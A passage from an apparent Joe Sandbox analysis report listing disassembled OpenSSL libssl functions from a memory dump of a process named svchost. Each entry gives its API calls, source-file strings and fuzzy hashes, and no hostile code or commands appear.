                                                                                              • Instruction Fuzzy Hash: 3122C1A1A0AA8285F722DB75D4D12BC27A0EF44B88F54C035DE6D876BADF3CE595C301
                                                                                              Function 00007FFBAB47CB30 Relevance: 77.4, APIs: 39, Strings: 5, Instructions: 379COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Init_exL_cleanseR_newR_set_debug$D_get_sizeFinal_exR_vset_errorX_freeX_newY_free
                                                                                              • String ID: HMAC$ext binder$res binder$ssl\statem\extensions.c$tls_psk_do_binder
                                                                                              • API String ID: 1391125327-4250429628
                                                                                              • Opcode ID: aa648eda198148f241356230853b77f506c39ac3c91fd7dc30166a0f7459d8b7
                                                                                              • Instruction ID: fdace0ce5fbf1bc1cc988bb80e38864aeaac9c2eeb586ec9ab6d704808527702
                                                                                              • Opcode Fuzzy Hash: aa648eda198148f241356230853b77f506c39ac3c91fd7dc30166a0f7459d8b7
                                                                                              • Instruction Fuzzy Hash: 5CF191B2A1EB8281E766DB32D8557BE6351FB84784F408032DE6D47AA6DF3CD194C700
                                                                                              Function 00007FFBAB4322E0 Relevance: 77.3, APIs: 42, Strings: 2, Instructions: 278COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432380
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432398
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4323A6
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4323C3
                                                                                              • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4323D5
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432401
                                                                                              • X509_get_pubkey.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432418
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432451
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432469
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB43247A
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432484
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB43249C
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB4324AB
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,00007FFBAB430B3A), ref: 00007FFBAB432742
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$L_sk_num$L_sk_valueX509_get_pubkeyY_free
                                                                                              • String ID: ssl\ssl_rsa.c$ssl_set_cert_and_key
                                                                                              • API String ID: 5495268-424671516
                                                                                              • Opcode ID: a1d7ba00e69706b45c3bd3fe9396481b6ccd245627e164c97f20f1ca8c06df68
                                                                                              • Instruction ID: ad42026b311d22a17fd9cc109398995f22d1c65590f574a38cba4d4730b248ce
                                                                                              • Opcode Fuzzy Hash: a1d7ba00e69706b45c3bd3fe9396481b6ccd245627e164c97f20f1ca8c06df68
                                                                                              • Instruction Fuzzy Hash: 93C141B2A4AA5281FA62AB32D4926FE2350FF44B84F54C031DD7D477B6DE3CE54A8701
                                                                                              Function 00007FFBAB4969E0 Relevance: 68.7, APIs: 35, Strings: 4, Instructions: 420COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_mallocX_freeX_new
                                                                                              • String ID: AES-256-CBC$SHA256$construct_stateless_ticket$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 1847107836-3117162005
                                                                                              • Opcode ID: b75908480853a0a3d47656859823882674881c45ef64c2ec60f94bd00c315812
                                                                                              • Instruction ID: bab8eeee8ac06c8036a965dafa07f0968830a44ebc42d7ffdd7dbf8dc52d6292
                                                                                              • Opcode Fuzzy Hash: b75908480853a0a3d47656859823882674881c45ef64c2ec60f94bd00c315812
                                                                                              • Instruction Fuzzy Hash: 2F026FA2B0E64385FB62DB72D4912BD23A1AF44784F40C432EE6D47AB6DF3DE5458341
                                                                                              Function 00007FFBAB41CB70 Relevance: 61.5, APIs: 32, Strings: 3, Instructions: 274COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(00000000,?,00007FFBAB426D26,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB41CB92
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(00000000,?,00007FFBAB426D26,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB41CBBC
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(00000000,?,00007FFBAB426D26,?,?,?,?,00007FFBAB4134DD), ref: 00007FFBAB41CBDB
                                                                                              • EVP_PKEY_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CC37
                                                                                              • X509_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CC89
                                                                                              • EVP_PKEY_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CC9F
                                                                                              • X509_chain_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CCAD
                                                                                              • CRYPTO_memdup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CCD9
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD22
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD3E
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD50
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD68
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD79
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CD98
                                                                                              • X509_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDBA
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDC6
                                                                                              • OSSL_STACK_OF_X509_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDD3
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CDED
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE18
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE2E
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE44
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE4D
                                                                                              • X509_STORE_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE56
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE7B
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CE91
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CEA6
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CEEB
                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF0B
                                                                                              • CRYPTO_memdup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF38
                                                                                              • X509_STORE_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF71
                                                                                              • X509_STORE_up_ref.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CF87
                                                                                              • CRYPTO_strdup.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFBAB41CFF0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$X509_$E_freeE_up_refO_mallocO_memdupO_zallocX509_freeY_freeY_up_refmemcpy$O_strdupR_newR_set_debugR_set_errorX509_chain_up_refX509_up_ref
                                                                                              • String ID: gfffffff$ssl\ssl_cert.c$ssl_cert_dup
                                                                                              • API String ID: 2506476208-2918673968
                                                                                              • Opcode ID: b2383af6243f51b575e5486e437ad1ab2c1274e53547ce8655614b89afad1b05
                                                                                              • Instruction ID: 471517dbd5c10ff0451a1cd970b1a8ab60496741febf8ac99faae7e24afcfb85
                                                                                              • Opcode Fuzzy Hash: b2383af6243f51b575e5486e437ad1ab2c1274e53547ce8655614b89afad1b05
                                                                                              • Instruction Fuzzy Hash: 06D140B2B0AB5296EB66DF36E5912AC33A4FB44B84F008136CE5D47765DF38E4A4C341
                                                                                              Function 00007FFBAB4982E7 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 409COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freememcpy$O_zallocR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_client_hello
                                                                                              • API String ID: 1337932799-2971398671
                                                                                              • Opcode ID: e02510164f2f826f8398bc0feb2822620d60f91c3c343bdc9e891f5f2849989e
                                                                                              • Instruction ID: 45b4d082d90057504339f08af6f4b221098bbf9e57e97281b861d07e58e7220d
                                                                                              • Opcode Fuzzy Hash: e02510164f2f826f8398bc0feb2822620d60f91c3c343bdc9e891f5f2849989e
                                                                                              • Instruction Fuzzy Hash: 2B02A2A2A1EA8281EB26DB35D4D12BD6761EB45784F00C131DEBE476F6DE3DE5A4C300
                                                                                              Function 00007FFBAB494460 Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 241COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$O_freeX_freeX_new
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_construct_cert_verify
                                                                                              • API String ID: 3285935519-1615455696
                                                                                              • Opcode ID: 47e8e463115130e5e1af129de5510440e8e6f5e6c7a007c25118c6b62e52d0d8
                                                                                              • Instruction ID: 45aa4c198488a6858d3d9aba5ca476b2663c5dc518fa6669ee02ee2dcf8a1dbd
                                                                                              • Opcode Fuzzy Hash: 47e8e463115130e5e1af129de5510440e8e6f5e6c7a007c25118c6b62e52d0d8
                                                                                              • Instruction Fuzzy Hash: B9A174E1A0E64281FA32D776D8812BE5391EF85B90F14C432EE6D87BF6DE2CE5058741
                                                                                              Function 00007FFBAB49C890 Relevance: 51.0, APIs: 24, Strings: 5, Instructions: 216COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C8D7
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C8EF
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C98A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB49DDC8), ref: 00007FFBAB49C9A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: 0$ssl\statem\statem_srvr.c$tls-client-version$tls-negotiated-version$tls_process_cke_rsa
                                                                                              • API String ID: 4275876640-318422981
                                                                                              • Opcode ID: e82aa647c1e71e8cc646951466d0efac38892dce83f138ac50626a02bed19007
                                                                                              • Instruction ID: 46a5b721f58f4c174ae21a51fb70e7dc71e6c3e4fc53744b12b01a03fe905e31
                                                                                              • Opcode Fuzzy Hash: e82aa647c1e71e8cc646951466d0efac38892dce83f138ac50626a02bed19007
                                                                                              • Instruction Fuzzy Hash: 0FA18EA2A1EA8281E722DB35E4916FD6360FB89784F40C131DEAD576A7DF3CE585C700
                                                                                              Function 00007FFBAB448400 Relevance: 49.2, APIs: 6, Strings: 22, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB4484C8
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB448503
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB4485B8
                                                                                              • GetCurrentProcessId.KERNEL32(02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB4485F8
                                                                                              • OpenSSL_version.LIBCRYPTO-3-X64(?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB448655
                                                                                              • BIO_snprintf.LIBCRYPTO-3-X64(?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE,?,00007FFBAB450F14), ref: 00007FFBAB448673
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$CurrentL_versionO_snprintfOpenProcess
                                                                                              • String ID: 0.3$JSON-SEQ$OpenSSL/%s (%s)$QUIC$client$common_fields$delta$description$group_id$name$process_id$protocol_type$qlog_format$qlog_version$server$ssl\quic\qlog.c$system_info$time_format$title$trace$type$vantage_point
                                                                                              • API String ID: 2463599471-1827591402
                                                                                              • Opcode ID: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                              • Instruction ID: b503104ded044e40e96be0cd2157119df4b1ecef55e65afb3caf843b29a9cce8
                                                                                              • Opcode Fuzzy Hash: c519cb3baef21b79d41f78c8beec8676423318cf7b238a91da5a5e575d69bddf
                                                                                              • Instruction Fuzzy Hash: 6C81EBF1A0E64242F96AEB35D6A22BD6362AF457C0F409031DE6E067B6DF7CE0158351
                                                                                              Function 00007FFBAB472FA0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB472FFC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473014
                                                                                                • Part of subcall function 00007FFBAB477530: ERR_vset_error.LIBCRYPTO-3-X64(?,?,00007FFBAB473310,?,00007FFBAB472C46), ref: 00007FFBAB47755E
                                                                                              • EVP_CIPHER_CTX_get0_cipher.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473048
                                                                                              • EVP_MD_get_size.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473055
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB47305F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000001,?,00007FFBAB472C46), ref: 00007FFBAB473077
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get_sizeR_vset_errorX_get0_cipher
                                                                                              • String ID: dtls_process_record$ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 755951681-2805733615
                                                                                              • Opcode ID: f7ebccd8a760c3d19fd7fbeb7e7855712576345588e8f1dc3867c87ee5accb7b
                                                                                              • Instruction ID: 5fbc2c33dac5082b519394046e535596cf08a562be12c67fdec3f3cc0f11561e
                                                                                              • Opcode Fuzzy Hash: f7ebccd8a760c3d19fd7fbeb7e7855712576345588e8f1dc3867c87ee5accb7b
                                                                                              • Instruction Fuzzy Hash: 6AB170B2A1A68292FB62DB31E4816FD2364FF44B84F408432DE6D57AB5DE38E595C301
                                                                                              Function 00007FFBAB48C7E0 Relevance: 44.0, APIs: 21, Strings: 4, Instructions: 206COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_clear_free$L_cleanse$O_freeR_vset_errorY_freeY_get1_encoded_public_key
                                                                                              • String ID: ssl\statem\statem_clnt.c$tls_construct_cke_ecdhe$tls_construct_cke_srp$tls_construct_client_key_exchange
                                                                                              • API String ID: 309064216-3169014888
                                                                                              • Opcode ID: 40d04c4f977c2e1087b9e7e159e1df514b1a354b1f57408a19e495b6994f3112
                                                                                              • Instruction ID: dbd3a98a4eeaa0f47922bcc9584fab9ba2f7848e0bed5aee6d95c19f15a5c548
                                                                                              • Opcode Fuzzy Hash: 40d04c4f977c2e1087b9e7e159e1df514b1a354b1f57408a19e495b6994f3112
                                                                                              • Instruction Fuzzy Hash: 709181A2A4E68281FA62ABB6E4417F92351EF80BC4F04C032DE6D477B7CE3DE5458351
                                                                                              Function 00007FFBAB4202B0 Relevance: 42.8, APIs: 20, Strings: 4, Instructions: 846stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$L_sk_free$L_sk_numL_sk_pushO_mallocstrncmp$L_sk_deleteL_sk_dupL_sk_new_nullL_sk_set_cmp_funcL_sk_sortL_sk_valueR_newR_set_debugR_set_error
                                                                                              • String ID: ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$NTOFDEFAULT$ssl\ssl_ciph.c
                                                                                              • API String ID: 3571880206-2581353747
                                                                                              • Opcode ID: 1405fa062426b2b81a248fb0295fe92e2fc98ede5a851c11c0418ba1936b4835
                                                                                              • Instruction ID: ea464582a642c6d3e99fe25b203e698eb6afede35ef4e793f969cca06be34102
                                                                                              • Opcode Fuzzy Hash: 1405fa062426b2b81a248fb0295fe92e2fc98ede5a851c11c0418ba1936b4835
                                                                                              • Instruction Fuzzy Hash: A5727AA2A0AB4581EE6ACF69D0406797BE0FB54B84F64C035DE6D477A0EF3DE981D340
